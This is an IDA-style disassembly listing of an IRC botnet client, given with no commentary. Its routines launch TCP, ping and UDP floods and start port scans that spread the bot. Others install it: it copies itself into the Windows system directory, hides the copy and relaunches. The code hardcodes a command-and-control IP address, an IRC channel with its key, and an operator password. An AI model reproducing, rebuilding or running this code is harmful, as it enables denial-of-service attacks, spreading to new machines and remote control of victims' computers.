cmp [ebp+var_101C], esi
jz short loc_40F1FB
jmp short loc_40F222
; ---------------------------------------------------------------------------
loc_40F20D: ; CODE XREF: sub_409848+589A�j
push offset aTcpInvalidFl_0 ; "[TCP]: Invalid flood time must be great"...
loc_40F212: ; CODE XREF: sub_409848+5884�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
pop ecx
pop ecx
loc_40F220: ; CODE XREF: sub_409848+5B1E�j
xor esi, esi
loc_40F222: ; CODE XREF: sub_409848+46CD�j
; sub_409848+59C3�j ...
cmp [ebp+var_C], esi
jnz loc_40EE4D
push esi
jmp loc_40EE32
; ---------------------------------------------------------------------------
loc_40F231: ; CODE XREF: sub_409848+14D7�j
; sub_409848+14EB�j ...
cmp dword_43A548, 0
jnz loc_40F34D
mov eax, [ebp+var_C]
mov [ebp+var_624], eax
mov eax, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_628], eax
lea eax, [ebp+var_6BC]
push eax
call sub_416A00
push [ebp+ebx+var_9C]
call sub_416D02
push [ebp+ebx+var_98]
mov [ebp+var_63C], eax
call sub_416D02
push [ebp+arg_0]
mov [ebp+var_638], eax
call sub_416D02
push 7Fh
push [ebp+var_9C]
mov [ebp+var_634], eax
lea eax, [ebp+var_73C]
push eax
call sub_416A00
push [ebp+var_634]
mov eax, [ebp+arg_4]
push [ebp+var_638]
mov [ebp+var_740], eax
lea eax, [ebp+var_6BC]
push eax
push [ebp+var_63C]
lea eax, [ebp+var_2F0]
push offset aPingSendingDPi ; "[PING]: Sending %d pings to %s. packet "...
push eax
call sub_416975
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 0Fh
push eax
call sub_413732
add esp, 48h
mov [ebp+var_62C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_740]
push eax
push offset sub_40893A
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_62C]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40F340
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aPingFailedToSt ; "[PING]: Failed to start flood thread, e"...
jmp loc_40F8C9
; ---------------------------------------------------------------------------
loc_40F338: ; CODE XREF: sub_409848+5AFE�j
push 32h
call dword_422000 ; Sleep
loc_40F340: ; CODE XREF: sub_409848+5ADD�j
cmp [ebp+var_620], esi
jz short loc_40F338
jmp loc_40F222
; ---------------------------------------------------------------------------
loc_40F34D: ; CODE XREF: sub_409848+59F0�j
push 1FFh
lea eax, [ebp+var_2F0]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_416A00
add esp, 0Ch
jmp loc_40F220
; ---------------------------------------------------------------------------
loc_40F36B: ; CODE XREF: sub_409848+149B�j
; sub_409848+14AF�j ...
mov eax, [ebp+var_C]
mov edi, [ebp+var_4]
push 7Fh
push [ebp+ebx+var_A0]
mov [ebp+var_624], eax
lea eax, [ebp+var_6BC]
push eax
mov [ebp+var_628], edi
call sub_416A00
push [ebp+ebx+var_9C]
call sub_416D02
push [ebp+ebx+var_98]
mov [ebp+var_63C], eax
call sub_416D02
push [ebp+arg_0]
mov [ebp+var_638], eax
call sub_416D02
mov ebx, [ebp+ebx+var_90]
xor esi, esi
add esp, 18h
cmp ebx, esi
mov [ebp+var_634], eax
jz short loc_40F3E3
push ebx
call sub_416D02
pop ecx
mov [ebp+var_630], eax
jmp short loc_40F3E9
; ---------------------------------------------------------------------------
loc_40F3E3: ; CODE XREF: sub_409848+5B8A�j
mov [ebp+var_630], esi
loc_40F3E9: ; CODE XREF: sub_409848+5B99�j
push 7Fh
push [ebp+var_9C]
lea eax, [ebp+var_73C]
push eax
call sub_416A00
push [ebp+var_634]
mov ebx, [ebp+arg_4]
push [ebp+var_638]
lea eax, [ebp+var_6BC]
push eax
push [ebp+var_63C]
lea eax, [ebp+var_2F0]
push offset aUdpSendingDPac ; "[UDP]: Sending %d packets to: %s. Packe"...
push eax
mov [ebp+var_740], ebx
call sub_416975
push esi
lea eax, [ebp+var_2F0]
push 10h
push eax
call sub_413732
add esp, 30h
mov [ebp+var_62C], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_740]
push eax
push offset sub_408AC3
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_62C]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40F4AA
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUdpFailedToSta ; "[UDP]: Failed to start flood thread, er"...
push eax
call sub_416975
add esp, 0Ch
loc_40F492: ; CODE XREF: sub_409848+5C6A�j
cmp [ebp+var_C], esi
jnz loc_40EE4D
push esi
push edi
jmp loc_40C8C2
; ---------------------------------------------------------------------------
loc_40F4A2: ; CODE XREF: sub_409848+5C68�j
push 32h
call dword_422000 ; Sleep
loc_40F4AA: ; CODE XREF: sub_409848+5C2D�j
cmp [ebp+var_620], esi
jz short loc_40F4A2
jmp short loc_40F492
; ---------------------------------------------------------------------------
loc_40F4B4: ; CODE XREF: sub_409848+1473�j
; sub_409848+1487�j
push 9
call sub_413922
mov esi, [ebp+ebx+var_9C]
push esi
mov edi, eax
call sub_416D02
add eax, edi
cmp eax, 258h
pop ecx
pop ecx
jle short loc_40F506
push edi
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_416975
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
jmp loc_40D17F
; ---------------------------------------------------------------------------
loc_40F506: ; CODE XREF: sub_409848+5C8B�j
push [ebp+ebx+var_A0]
call sub_416D02
push esi
mov [ebp+var_4F4], eax
call sub_416D02
push [ebp+ebx+var_98]
mov [ebp+var_4DC], eax
call sub_416D02
add esp, 0Ch
cmp eax, 5
mov [ebp+var_4F0], eax
jnb short loc_40F547
push 5
pop eax
mov [ebp+var_4F0], eax
loc_40F547: ; CODE XREF: sub_409848+5CF4�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_40F554
mov [ebp+var_4F0], ecx
loc_40F554: ; CODE XREF: sub_409848+5D04�j
push [ebp+arg_0]
call sub_416D02
mov [ebp+var_4EC], eax
mov eax, 320h
cmp [ebp+var_4EC], eax
pop ecx
jbe short loc_40F576
mov [ebp+var_4EC], eax
loc_40F576: ; CODE XREF: sub_409848+5D26�j
push [ebp+arg_4]
or [ebp+var_4D8], 0FFFFFFFFh
call sub_408894
pop ecx
lea edx, [ebp+var_60C]
loc_40F58C: ; CODE XREF: sub_409848+5D4C�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40F58C
xor edi, edi
cmp dword_42E068, edi
mov [ebp+var_5FC], edi
mov [ebp+var_10], edi
jz short loc_40F60C
mov ecx, offset dword_42E068
loc_40F5AE: ; CODE XREF: sub_409848+5DA4�j
mov edi, [ebp+ebx+var_A0]
lea esi, [ecx-28h]
loc_40F5B8: ; CODE XREF: sub_409848+5D8C�j
mov dl, [esi]
mov al, dl
cmp dl, [edi]
jnz short loc_40F5DA
test al, al
jz short loc_40F5D6
mov dl, [esi+1]
mov al, dl
cmp dl, [edi+1]
jnz short loc_40F5DA
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40F5B8
loc_40F5D6: ; CODE XREF: sub_409848+5D7A�j
xor eax, eax
jmp short loc_40F5DF
; ---------------------------------------------------------------------------
loc_40F5DA: ; CODE XREF: sub_409848+5D76�j
; sub_409848+5D84�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F5DF: ; CODE XREF: sub_409848+5D90�j
test eax, eax
jz short loc_40F5F0
inc [ebp+var_10]
add ecx, 3Ch
cmp dword ptr [ecx], 0
jnz short loc_40F5AE
jmp short loc_40F60A
; ---------------------------------------------------------------------------
loc_40F5F0: ; CODE XREF: sub_409848+5D99�j
mov eax, [ebp+var_10]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42E068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40F60A: ; CODE XREF: sub_409848+5DA6�j
xor edi, edi
loc_40F60C: ; CODE XREF: sub_409848+5D5F�j
cmp [ebp+var_4F4], edi
jnz short loc_40F636
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
loc_40F619: ; CODE XREF: sub_409848+5EA2�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
loc_40F625: ; CODE XREF: sub_409848+4799�j
pop ecx
pop ecx
loc_40F627: ; CODE XREF: sub_409848+48B7�j
; sub_409848+48CC�j
cmp [ebp+var_C], edi
jnz loc_40EE4D
push edi
jmp loc_40EE32
; ---------------------------------------------------------------------------
loc_40F636: ; CODE XREF: sub_409848+5DCA�j
mov esi, [ebp+ebx+var_90]
cmp esi, edi
mov [ebp+var_1C], esi
jz short loc_40F674
cmp byte ptr [esi], 23h
jz short loc_40F674
push esi
lea eax, [ebp+var_61C]
push 10h
push eax
call sub_416BCD
push 78h
push esi
call sub_417E80
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_4C8], eax
jmp loc_40F7AA
; ---------------------------------------------------------------------------
loc_40F674: ; CODE XREF: sub_409848+5DFA�j
; sub_409848+5DFF�j
cmp [ebp+var_376], 0
jz short loc_40F69E
push 0Fh
lea eax, [ebp+var_60C]
push offset dword_42FE80
push eax
call sub_416A00
mov eax, dword_42FE90
add esp, 0Ch
mov [ebp+var_5FC], eax
loc_40F69E: ; CODE XREF: sub_409848+5E33�j
cmp byte ptr [ebp+var_380+1], 0
jz short loc_40F6CA
push edi
push 9
push offset aStoppingPrevio ; "Stopping previous scans"
push offset aScan_0 ; "[SCAN]"
push 1
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_413968
add esp, 20h
loc_40F6CA: ; CODE XREF: sub_409848+5E5D�j
cmp [ebp+var_38F], 0
jnz short loc_40F6EF
cmp [ebp+var_38E], 0
jnz short loc_40F6EF
cmp byte ptr [ebp+var_380+2], 0
jnz short loc_40F6EF
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, no IP spe"...
jmp loc_40F619
; ---------------------------------------------------------------------------
loc_40F6EF: ; CODE XREF: sub_409848+5E89�j
; sub_409848+5E92�j ...
push 10h
pop esi
lea eax, [ebp+var_BC]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_BC], esi
call dword_43A328 ; getsockname
mov al, [ebp+var_38F]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_61C]
push eax
call sub_416A00
add esp, 0Ch
cmp byte ptr [ebp+var_380+2], 0
jz short loc_40F7A4
xor eax, eax
cmp [ebp+var_38F], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_61C]
push eax
call sub_4169D0
and byte ptr [ebp+arg_0+3], 0
cmp esi, edi
pop ecx
pop ecx
jle short loc_40F798
loc_40F776: ; CODE XREF: sub_409848+5F4E�j
cmp eax, edi
jz short loc_40F798
mov byte ptr [eax], 78h
lea eax, [ebp+var_61C]
push 30h
push eax
call sub_4169D0
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, esi
jl short loc_40F776
loc_40F798: ; CODE XREF: sub_409848+5F2C�j
; sub_409848+5F30�j
mov [ebp+var_4C8], 1
jmp short loc_40F7AA
; ---------------------------------------------------------------------------
loc_40F7A4: ; CODE XREF: sub_409848+5F05�j
mov [ebp+var_4C8], edi
loc_40F7AA: ; CODE XREF: sub_409848+5E27�j
; sub_409848+5F5A�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4CC], eax
mov esi, 80h
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_416BCD
mov ebx, [ebp+ebx+var_8C]
add esp, 0Ch
cmp ebx, edi
jz short loc_40F7FE
push ebx
loc_40F7EC: ; CODE XREF: sub_409848+5FC3�j
push esi
loc_40F7ED: ; CODE XREF: sub_409848+5FE0�j
lea eax, [ebp+var_578]
push eax
call sub_416BCD
add esp, 0Ch
jmp short loc_40F831
; ---------------------------------------------------------------------------
loc_40F7FE: ; CODE XREF: sub_409848+5FA1�j
mov eax, [ebp+var_1C]
cmp eax, edi
jz short loc_40F80D
cmp byte ptr [eax], 23h
jnz short loc_40F80D
push eax
jmp short loc_40F7EC
; ---------------------------------------------------------------------------
loc_40F80D: ; CODE XREF: sub_409848+5FBB�j
; sub_409848+5FC0�j
xor ecx, ecx
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 422B02h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40F82A
push eax
push 80h
jmp short loc_40F7ED
; ---------------------------------------------------------------------------
loc_40F82A: ; CODE XREF: sub_409848+5FD8�j
and [ebp+var_578], 0
loc_40F831: ; CODE XREF: sub_409848+5FB4�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40F845
mov eax, offset aSequential ; "Sequential"
loc_40F845: ; CODE XREF: sub_409848+5FF6�j
push [ebp+var_4DC]
lea ecx, [ebp+var_61C]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_416975
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_413732
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_61C]
push eax
push offset sub_401B94
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40F8E5
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
loc_40F8C9: ; CODE XREF: sub_409848+59AE�j
; sub_409848+5AEB�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 0Ch
jmp loc_40F222
; ---------------------------------------------------------------------------
loc_40F8DD: ; CODE XREF: sub_409848+60A3�j
push 32h
call dword_422000 ; Sleep
loc_40F8E5: ; CODE XREF: sub_409848+6073�j
cmp [ebp+var_4C4], esi
jz short loc_40F8DD
jmp loc_40F222
; ---------------------------------------------------------------------------
loc_40F8F2: ; CODE XREF: sub_409848+D18�j
; sub_409848+D2C�j
push [ebp+ebx+var_A0]
xor eax, eax
cmp byte ptr [ebp+var_380], al
setnz al
push eax
push dword_42FCDC
lea eax, [ebp+var_4BC]
push eax
call sub_411114
lea eax, [ebp+var_4BC]
push eax
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405D17
lea eax, [ebp+var_4BC]
push eax
push offset aMainRandomNick ; "[MAIN]: Random nick change: %s"
call sub_401F83
loc_40F93C: ; CODE XREF: sub_409848+5823�j
add esp, 24h
loc_40F93F: ; CODE XREF: sub_409848+738�j
; sub_409848+744�j ...
mov eax, [ebp+arg_24]
jmp loc_409AC9
; ---------------------------------------------------------------------------
loc_40F947: ; CODE XREF: sub_409848+7C5�j
; sub_409848+7D9�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
mov [ebp+var_8], ebx
jz loc_409AC6
cmp [ebp+var_1C], 0
jnz loc_409AC6
push offset asc_42A9B4 ; "!"
push [ebp+var_A4]
call sub_4177E9
mov esi, eax
push offset dword_428730
push 0
inc esi
call sub_4177E9
push offset asc_42872C ; "~"
push eax
call sub_4177E9
mov edi, [ebp+var_8]
mov ebx, eax
add esp, 18h
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40F99A: ; CODE XREF: sub_409848+616E�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_40F9BC
test cl, cl
jz short loc_40F9B8
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_40F9BC
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_40F99A
loc_40F9B8: ; CODE XREF: sub_409848+615C�j
xor eax, eax
jmp short loc_40F9C1
; ---------------------------------------------------------------------------
loc_40F9BC: ; CODE XREF: sub_409848+6158�j
; sub_409848+6166�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40F9C1: ; CODE XREF: sub_409848+6172�j
test eax, eax
jz short loc_40FA10
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_405D17
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_405D17
push ebx
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40F9FC: ; CODE XREF: sub_409848+621B�j
lea eax, [ebp+var_2F0]
push eax
call sub_416975
add esp, 30h
jmp loc_40EE4D
; ---------------------------------------------------------------------------
loc_40FA10: ; CODE XREF: sub_409848+617B�j
xor edi, edi
loc_40FA12: ; CODE XREF: sub_409848+61E2�j
push ebx
push off_42FDB8[edi]
call sub_414038
test eax, eax
pop ecx
pop ecx
jnz short loc_40FA65
add edi, 4
cmp edi, 4
jb short loc_40FA12
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_405D17
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_405D17
push ebx
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40F9FC
; ---------------------------------------------------------------------------
loc_40FA65: ; CODE XREF: sub_409848+61DA�j
mov edx, [ebp+arg_18]
xor eax, eax
loc_40FA6A: ; CODE XREF: sub_409848+6264�j
cmp byte ptr [edx], 0
jnz short loc_40FAA2
mov edi, [ebp+var_8]
mov esi, offset aN3m3s1s ; "n3m3s1s"
loc_40FA77: ; CODE XREF: sub_409848+624B�j
mov bl, [esi]
mov cl, bl
cmp bl, [edi]
jnz short loc_40FA99
test cl, cl
jz short loc_40FA95
mov bl, [esi+1]
mov cl, bl
cmp bl, [edi+1]
jnz short loc_40FA99
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_40FA77
loc_40FA95: ; CODE XREF: sub_409848+6239�j
xor ecx, ecx
jmp short loc_40FA9E
; ---------------------------------------------------------------------------
loc_40FA99: ; CODE XREF: sub_409848+6235�j
; sub_409848+6243�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_40FA9E: ; CODE XREF: sub_409848+624F�j
test ecx, ecx
jz short loc_40FAB3
loc_40FAA2: ; CODE XREF: sub_409848+6225�j
inc eax
add edx, 80h
cmp eax, 2
jl short loc_40FA6A
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40FAB3: ; CODE XREF: sub_409848+6258�j
shl eax, 7
add eax, [ebp+arg_18]
push 7Fh
lea ecx, [ebp+var_8F0]
push ecx
push eax
call sub_416A00
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40FAEC
push 0
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40FAEC: ; CODE XREF: sub_409848+6287�j
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40FAF8: ; CODE XREF: sub_409848+6F5�j
; sub_409848+505F�j ...
call sub_401F83
pop ecx
loc_40FAFE: ; CODE XREF: sub_409848+39AD�j
pop ecx
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40FB04: ; CODE XREF: sub_409848+1FA�j
; sub_409848+20D�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_405D17
push offset aIx ; "+ix"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_405D17
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405D17
xor eax, eax
add esp, 2Ch
inc eax
mov dword_480AE0, eax
jmp loc_409AC9
sub_409848 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB4C proc near ; CODE XREF: .text:0041881F�p
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = byte ptr -0E8h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_403500
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, dword_422004
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_480AD8, eax
call esi ; GetTickCount
push eax
call sub_416B24
pop ecx
call sub_406217
push 2
call dword_43A394 ; SetErrorMode
push 7530h
push offset aBot013 ; "Bot013"
push ebx
push ebx
call dword_422104 ; CreateMutexA
push eax
call dword_422100 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40FBCB
push 1
jmp loc_40FE2B
; ---------------------------------------------------------------------------
loc_40FBCB: ; CODE XREF: sub_40FB4C+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_43A3CC ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_41009E
cmp [ebp+var_888], 2
jnz loc_410098
cmp [ebp+var_887], 2
jnz loc_410098
mov esi, 104h
push esi
lea eax, [ebp+var_3F4]
push eax
call dword_422048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_2F0]
push eax
push ebx
call dword_4220A4 ; GetModuleHandleA
push eax
call dword_422010 ; GetModuleFileNameA
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_41809F
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_416BCD
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_417440
add esp, 30h
test eax, eax
jnz loc_40FE31
cmp dword_42FCCC, ebx
mov esi, offset byte_42FD4C
jz short loc_40FCD3
mov eax, esi
xor edi, edi
lea ecx, [eax+1]
loc_40FC99: ; CODE XREF: sub_40FB4C+152�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FC99
sub eax, ecx
add eax, 0FFFFFFFAh
test eax, eax
jbe short loc_40FCD3
loc_40FCA9: ; CODE XREF: sub_40FB4C+185�j
call sub_416B31
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, esi
lea ecx, [eax+1]
add dl, 61h
mov byte_42FD4C[edi], dl
inc edi
loc_40FCC3: ; CODE XREF: sub_40FB4C+17C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40FCC3
sub eax, ecx
add eax, 0FFFFFFFAh
cmp edi, eax
jb short loc_40FCA9
loc_40FCD3: ; CODE XREF: sub_40FB4C+144�j
; sub_40FB4C+15B�j
push esi
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_1EC]
push offset aSS_0 ; "%s\\%s"
push eax
call sub_416975
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call dword_4220A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40FD13
push 80h
lea eax, [ebp+var_1EC]
push eax
call dword_4220CC ; SetFileAttributesA
loc_40FD13: ; CODE XREF: sub_40FB4C+1B3�j
mov esi, dword_422000
push 7D0h
call esi ; Sleep
mov edi, dword_4220FC
mov [ebp+var_4], ebx
jmp short loc_40FD4E
; ---------------------------------------------------------------------------
loc_40FD2B: ; CODE XREF: sub_40FB4C+215�j
call dword_422008 ; RtlGetLastWin32Error
cmp [ebp+var_4], ebx
jnz short loc_40FD63
cmp eax, 20h
jz short loc_40FD40
cmp eax, 5
jnz short loc_40FD63
loc_40FD40: ; CODE XREF: sub_40FB4C+1ED�j
push 3A98h
mov [ebp+var_4], 1
call esi ; Sleep
loc_40FD4E: ; CODE XREF: sub_40FB4C+1DD�j
push ebx
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_2F0]
push eax
call edi ; CopyFileA
test eax, eax
jz short loc_40FD2B
loc_40FD63: ; CODE XREF: sub_40FB4C+1E8�j
; sub_40FB4C+1F2�j
lea eax, [ebp+var_1EC]
push eax
call sub_4074B0
pop ecx
push 7
lea eax, [ebp+var_1EC]
push eax
call dword_4220CC ; SetFileAttributesA
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
xor edi, edi
inc edi
mov [ebp+var_5C], 422B02h
mov [ebp+var_68], 44h
mov [ebp+var_3C], edi
mov [ebp+var_38], bx
call dword_4220F8 ; GetCurrentProcessId
push eax
push edi
push 100000h
call dword_422078 ; OpenProcess
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_416975
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push edi
push ebx
push ebx
lea eax, [ebp+var_98C]
push eax
lea eax, [ebp+var_1EC]
push eax
call dword_422044 ; CreateProcessA
test eax, eax
jz short loc_40FE37
push 0C8h
call esi ; Sleep
push [ebp+var_24]
mov esi, dword_42202C
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_43A4DC ; WSACleanup
push ebx
loc_40FE2B: ; CODE XREF: sub_40FB4C+7A�j
call dword_422040 ; ExitProcess
loc_40FE31: ; CODE XREF: sub_40FB4C+133�j
mov esi, dword_422000
loc_40FE37: ; CODE XREF: sub_40FB4C+2BF�j
cmp dword_481198, 2
jle short loc_40FE7F
mov eax, dword_48119C
push dword ptr [eax+4]
call sub_416D02
pop ecx
mov edi, eax
push 0FFFFFFFFh
push edi
call dword_422100 ; WaitForSingleObject
push edi
call dword_42202C ; CloseHandle
mov eax, dword_48119C
cmp [eax+8], ebx
jz short loc_40FE7F
push 7D0h
call esi ; Sleep
mov eax, dword_48119C
push dword ptr [eax+8]
call dword_4220E4 ; DeleteFileA
loc_40FE7F: ; CODE XREF: sub_40FB4C+2F2�j
; sub_40FB4C+31C�j
cmp dword_42FCD0, ebx
jz short loc_40FE9C
cmp dword_43A528, ebx
jnz short loc_40FE9C
lea eax, [ebp+var_4F8]
push eax
call sub_40214F
pop ecx
loc_40FE9C: ; CODE XREF: sub_40FB4C+339�j
; sub_40FB4C+341�j
lea eax, [ebp+var_E8]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_416975
push ebx
lea eax, [ebp+var_E8]
push ebx
push eax
call sub_413732
lea eax, [ebp+var_E8]
push eax
call sub_401F0F
xor eax, eax
mov ecx, 2E0h
mov edi, offset dword_47FF58
rep stosd
lea eax, [ebp+var_E8]
push offset aSecureSystemSe ; "[SECURE]: System secure monitor active."...
push eax
call sub_416975
push ebx
lea eax, [ebp+var_E8]
push 1Ah
push eax
call sub_413732
add esp, 2Ch
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push offset sub_411969
push ebx
push ebx
call dword_42200C ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_43B274[esi], eax
jnz short loc_40FF38
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_E8]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_416975
add esp, 0Ch
loc_40FF38: ; CODE XREF: sub_40FB4C+3CF�j
lea eax, [ebp+var_E8]
push eax
call sub_401F0F
call sub_416B31
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
mov ebx, offset dword_47FDF4
push ebx
mov dword_480AE4, eax
call sub_416A00
mov eax, dword_42FCB0
push 3Fh
push offset aParadise ; "#paradise"
mov edi, offset dword_47FE74
push edi
mov dword_47FF44, eax
call sub_416A00
push 3Fh
push offset aTroopers ; "troopers"
mov esi, offset dword_47FEB4
push esi
call sub_416A00
add esp, 28h
and dword_47FF48, 0
loc_40FF98: ; CODE XREF: sub_40FB4C+4F5�j
; sub_40FB4C+501�j ...
and [ebp+var_4], 0
loc_40FF9C: ; CODE XREF: sub_40FB4C+4AB�j
cmp dword_43A540, 0
jnz short loc_40FFBC
push 0
